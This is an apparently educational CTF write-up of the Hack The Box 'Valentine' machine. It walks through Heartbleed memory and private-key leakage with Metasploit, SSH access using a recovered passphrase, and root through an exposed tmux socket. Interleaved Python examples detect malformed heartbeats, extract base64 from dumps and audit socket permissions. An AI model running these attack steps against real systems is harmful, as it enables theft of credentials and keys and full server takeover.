# Enumeration
### NMAP
```text
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2021-05-13T09:00:42+00:00; +3m55s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 3m54s
```
### Web Application
### Dirbuster
The Dirbuster results (screenshot not reproduced here) point to `/dev/notes`, which contains:
```text
To do:
1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.
```
Both ports 80 and 443 offer the same functionality. The first thing we see is a woman and a bleeding heart. Oddly enough, there is an OpenSSL vulnerability called *[Heartbleed](https://heartbleed.com)*.
# Exploit w/ Metasploit
I am running the Metasploit auxiliary module first to check whether this machine is vulnerable, and then with the DUMP action to read the information the server leaks from its memory.
```text
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > exploit
[+] 10.10.10.79:443 - Heartbeat response with leak, 65535 bytes
[*] 10.10.10.79:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run
[+] 10.10.10.79:443 - Heartbeat response with leak, 65535 bytes
[+] 10.10.10.79:443 - Heartbeat data stored in /root/.msf4/loot/20210513073901_default_10.10.10.79_openssl.heartble_912349.bin
[*] 10.10.10.79:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
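What the scanner above relies on is a Heartbeat request whose declared payload length is larger than the data actually sent; a vulnerable OpenSSL copied that many bytes back. The same property makes the request easy to spot on the wire. The following is an added example, not code from the writeup or from Metasploit: it parses a TLS record, checks the heartbeat length field against the record size, and runs over a few constructed sample records (not captured traffic). The TLS and heartbeat layouts follow RFC 5246 and RFC 6520.

```python
import struct

TLS_HEARTBEAT = 0x18   # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST = 1
MIN_PADDING = 16       # RFC 6520 requires at least 16 bytes of padding


def parse_tls_record(data: bytes):
    """Split one TLS record into (content_type, version, body); raise on truncation."""
    if len(data) < 5:
        raise ValueError("truncated TLS record header")
    ctype, version, length = struct.unpack("!BHH", data[:5])
    body = data[5:5 + length]
    if len(body) != length:
        raise ValueError("record body shorter than declared length")
    return ctype, version, body


def is_malformed_heartbeat(record: bytes) -> bool:
    """True when a heartbeat's declared payload_length cannot fit in its record.

    Vulnerable OpenSSL builds trusted payload_length and echoed that many bytes,
    so a request that declares more payload than it carries is the signature
    worth alerting on; a patched peer silently discards such a message.
    """
    ctype, _version, body = parse_tls_record(record)
    if ctype != TLS_HEARTBEAT or len(body) < 3:
        return False
    _hb_type, payload_len = struct.unpack("!BH", body[:3])
    # header (3 bytes) + declared payload + minimum padding must fit in the body
    return payload_len + 3 + MIN_PADDING > len(body)


def scan_records(records):
    """Return indices of records that trip the check; unparsable records count as hits."""
    hits = []
    for i, rec in enumerate(records):
        try:
            if is_malformed_heartbeat(rec):
                hits.append(i)
        except ValueError:
            hits.append(i)
    return hits


# Constructed sample records (not captured traffic):
# benign: declares 4 bytes of payload ("ping"), record body is 3 + 4 + 16 = 23 bytes
BENIGN_HEARTBEAT = b"\x18\x03\x02\x00\x17" + b"\x01\x00\x04ping" + b"\x00" * 16
# oversized: same bytes on the wire but declares 0x4000 bytes of payload
OVERSIZED_HEARTBEAT = b"\x18\x03\x02\x00\x17" + b"\x01\x40\x00ping" + b"\x00" * 16
# a handshake record, which the check must ignore
HANDSHAKE_RECORD = b"\x16\x03\x01\x00\x02\x01\x00"
```

The same comparison is what the public IDS signatures for this bug perform; in practice it is applied to TLS records reassembled from the TCP stream, which this example leaves to the capture tool.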
I am going to use *strings* to check the contents of the binary file stored as loot. Among the leaked data is what looks like a form submission, including a base64-encoded text value.
```text
$ sudo strings /root/.msf4/loot/20210513073901_default_10.10.10.79_openssl.heartble_912349.bin
[sudo] password for kali:
0&J/
u8DF
ux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Referer: https://127.0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
.Dl[
/m:t w
wHXpq
N[xckM
t]Sd
fwF)u`
1MC&
P0N0
["lr
["lr
'760{pu
.Dl[
/m:t w
wHXpq
N[xckM
```
The decoded value is ***heartbleedbelievethehype***, which I guess is a passphrase.
```text
$ printf "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
heartbleedbelievethehype
```
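Picking the `$text=` value out of the dump by eye works for one file, but a leaked memory buffer can be large. As an added example (not from the writeup), the code below reproduces what was done above in a repeatable way: it approximates `strings` by pulling printable runs out of a binary blob, then looks for base64-shaped tokens and keeps only those that decode to readable text. The sample dump is constructed inline around the request fragment seen above; the detection thresholds (4 printable bytes, 16 base64 characters) are choices of this example.

```python
import base64
import binascii
import re

# strings(1) default: runs of at least 4 printable ASCII bytes
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")
# a base64 token: 16+ alphabet characters plus optional padding, not glued to more alphabet characters
B64_TOKEN = re.compile(rb"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/])")


def extract_strings(blob: bytes):
    """Approximate `strings`: return the printable runs found in a binary blob."""
    return [m.group(0) for m in PRINTABLE_RUN.finditer(blob)]


def looks_textual(raw: bytes) -> bool:
    """Keep only decodes that are plain ASCII text (tab/newline allowed)."""
    return bool(raw) and all(0x20 <= b <= 0x7E or b in (9, 10, 13) for b in raw)


def decode_base64_candidates(blob: bytes):
    """Return (token, decoded) pairs for base64-looking tokens that decode to readable text."""
    hits = []
    for run in extract_strings(blob):
        for m in B64_TOKEN.finditer(run):
            token = m.group(0)
            try:
                raw = base64.b64decode(token, validate=True)
            except (binascii.Error, ValueError):
                continue  # alphabet-looking garbage that is not valid base64
            if looks_textual(raw):
                hits.append((token, raw))
    return hits


# Constructed stand-in for the loot file: junk bytes around the request fragment seen above.
SAMPLE_DUMP = (
    b"\x00\x16\x03\x01\xff\x8a0&J/\x00u8DF\x00"
    b"Referer: https://127.0.0.1/decode.php\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 42\r\n\r\n"
    b"$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==\x00"
    b".Dl[\x00wHXpq\x00N[xckM\xfe"
)
```

On a real loot file you would read the bytes from disk and feed them to `decode_base64_candidates`; the textual filter is what keeps random alphanumeric runs from the binary data out of the result.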
Next, I want to see which other actions this module offers.
```text
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------
   DUMP  Dump memory contents to loot
   KEYS  Recover private keys from memory
   SCAN  Check hosts for vulnerability

msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS
action => KEYS
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run
[*] 10.10.10.79:443 - Scanning for private keys
[*] 10.10.10.79:443 - Getting public key constants...
[*] 10.10.10.79:443 - 2021-05-13 11:42:28 UTC - Starting.
[*] 10.10.10.79:443 - 2021-05-13 11:42:28 UTC - Attempt 0...
[+] 10.10.10.79:443 - 2021-05-13 11:42:30 UTC - Got the private key
[*] 10.10.10.79:443 - -----BEGIN RSA PRIVATE KEY-----
...snip...
-----END RSA PRIVATE KEY-----
[*] 10.10.10.79:443 - Private key stored in /root/.msf4/loot/20210513074230_default_10.10.10.79_openssl.heartble_001596.txt
[*] 10.10.10.79:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Now that I had a passphrase and a private key, I tried to log in with usernames such as admin, bleed, heart, heartbleed, bleedheart, valentine and others. In the end I had to go back over my enumeration to find what I had missed. In the /dev/ directory there is a second file called *hype_key*, which not only contains a private key as a hex string but also reveals that the key's owner is named ***hype***. I pasted the hex value into a hex-to-text converter and got a second private key. All that was left was to copy the key into a file, change its permissions to 600 and SSH to the box using the passphrase found earlier.
```text
# ssh -i web_key hype@10.10.10.79
Enter passphrase for key 'web_key':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$
```
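The hex-to-PEM conversion and the `chmod 600` step above are easy to get subtly wrong (a stray newline in the hex, a key file created world-readable for a moment before the chmod). As an added example, not code from the writeup, the block below decodes a hex string into PEM, verifies the PEM framing, tells you in advance whether the key will prompt for a passphrase (legacy OpenSSL keys carry `Proc-Type`/`DEK-Info` headers when encrypted), and creates the key file with mode 0600 from the outset. The PEM used here is a constructed placeholder, not the key recovered from the box; the file name `web_key` is the one used above.

```python
import binascii
import os
import shutil
import stat
import tempfile

PEM_BEGIN = b"-----BEGIN "
PEM_END = b"-----END "


def hex_to_pem(hex_text: str) -> bytes:
    """Decode hex (whitespace and line breaks tolerated) and verify PEM framing."""
    compact = "".join(hex_text.split())
    try:
        raw = binascii.unhexlify(compact)
    except (binascii.Error, ValueError) as exc:
        raise ValueError(f"not valid hex: {exc}") from exc
    if not raw.lstrip().startswith(PEM_BEGIN) or PEM_END not in raw:
        raise ValueError("decoded bytes are not a PEM block")
    return raw


def is_passphrase_protected(pem: bytes) -> bool:
    """Legacy OpenSSL PEM keys flag encryption with Proc-Type/DEK-Info headers."""
    return b"Proc-Type: 4,ENCRYPTED" in pem and b"DEK-Info:" in pem


def write_private_key(pem: bytes, path: str) -> int:
    """Create the file 0600 from the outset (no chmod window) and return its mode bits."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(pem)
    return stat.S_IMODE(os.stat(path).st_mode)


# Constructed placeholder, not the key from the box: the body is not real key material.
PLACEHOLDER_PEM = (
    b"-----BEGIN RSA PRIVATE KEY-----\n"
    b"Proc-Type: 4,ENCRYPTED\n"
    b"DEK-Info: AES-128-CBC,00000000000000000000000000000000\n"
    b"\n"
    b"UExBQ0VIT0xERVIgLSBOT1QgQSBSRUFMIEtFWQ==\n"
    b"-----END RSA PRIVATE KEY-----\n"
)
# The hex as a hex-to-text tool would receive it, wrapped at 64 characters per line.
_hex = PLACEHOLDER_PEM.hex()
SAMPLE_HEX = "\n".join(_hex[i:i + 64] for i in range(0, len(_hex), 64))


def demo_roundtrip():
    """Decode the hex, write web_key with owner-only permissions, return (pem, mode)."""
    pem = hex_to_pem(SAMPLE_HEX)
    workdir = tempfile.mkdtemp()
    try:
        mode = write_private_key(pem, os.path.join(workdir, "web_key"))
    finally:
        shutil.rmtree(workdir)
    return pem, mode
```

`os.O_EXCL` makes the call fail rather than overwrite an existing file, and passing the mode to `os.open` means ssh never sees the key with permissions looser than 0600.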
There are many ways to get root on this machine. The output of *linuxprivchecker.py* revealed SUID files of interest, a root-owned tmux process listening on a *dev_sess* socket, and a kernel vulnerable to DirtyCow, among others. I chose the tmux route to save some time.
```text
hype@Valentine:~/Desktop$ ps aux
...snip...
root      1020  0.0  0.1  26416  1672 ?        Ss   01:59   0:05 /usr/bin/tmux -S /.devs/dev_sess
...snip...
hype@Valentine:~/Desktop$ tmux -S /.devs/dev_sess
root@Valentine:/home/hype/Desktop# whoami
root
```
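The reason this works is that attaching to a tmux server is a `connect()` on its Unix socket, and connecting needs write permission on the socket inode plus a traversable parent directory. A root-owned socket that grants either of those to other users hands out a root shell. As an added example (not from the writeup), the audit below walks a directory tree and reports sockets that group or others can connect to, optionally restricted to sockets owned by a given uid (0 for root). Its demo builds a constructed scenario in a temporary directory mirroring `/.devs/dev_sess` under three permission settings; the only-immediate-parent directory check and the `SocketFinding` shape are choices of this example.

```python
import os
import shutil
import socket
import stat
import tempfile
from dataclasses import dataclass


@dataclass
class SocketFinding:
    path: str
    owner_uid: int
    mode: int      # permission bits of the socket inode
    dir_mode: int  # permission bits of the containing directory


def _searchable_by_others(dir_path: str) -> bool:
    """A socket is only reachable if group/others can traverse its directory."""
    mode = stat.S_IMODE(os.stat(dir_path).st_mode)
    return bool(mode & (stat.S_IXGRP | stat.S_IXOTH))


def audit_sockets(root: str, only_uid=None):
    """Walk root and return sockets that group/others can connect to.

    connect(2) on a Unix socket needs write permission on the socket inode,
    so w for group or others plus a traversable parent directory is the bar.
    Only the immediate parent is checked; ancestors of root are assumed open.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISSOCK(st.st_mode):
                continue
            if only_uid is not None and st.st_uid != only_uid:
                continue
            mode = stat.S_IMODE(st.st_mode)
            if mode & (stat.S_IWGRP | stat.S_IWOTH) and _searchable_by_others(dirpath):
                findings.append(SocketFinding(path, st.st_uid, mode,
                                              stat.S_IMODE(os.stat(dirpath).st_mode)))
    return findings


def demo():
    """Constructed scenario: a dev_sess-style socket under three permission settings.

    Returns the number of findings for (world-writable socket in an open directory,
    owner-only socket, world-writable socket inside a 0700 directory).
    """
    base = tempfile.mkdtemp()
    devs = os.path.join(base, ".devs")
    os.mkdir(devs)
    os.chmod(devs, 0o755)
    sock_path = os.path.join(devs, "dev_sess")
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        srv.bind(sock_path)
        os.chmod(sock_path, 0o666)  # the weak setting: anyone can connect
        exposed = len(audit_sockets(base))
        os.chmod(sock_path, 0o600)  # fixed: owner-only socket
        owner_only = len(audit_sockets(base))
        os.chmod(sock_path, 0o666)
        os.chmod(devs, 0o700)       # loose socket but locked directory: unreachable
        locked_dir = len(audit_sockets(base))
        return exposed, owner_only, locked_dir
    finally:
        srv.close()
        os.chmod(devs, 0o700)
        shutil.rmtree(base)
```

Run against `/` with `only_uid=0` (as root, so every directory can be walked) to list root-owned sockets reachable by ordinary users; tmux itself keeps its default socket under a per-user 0700 directory, so any finding like the one above is a deliberate `-S` path that needs its permissions tightened.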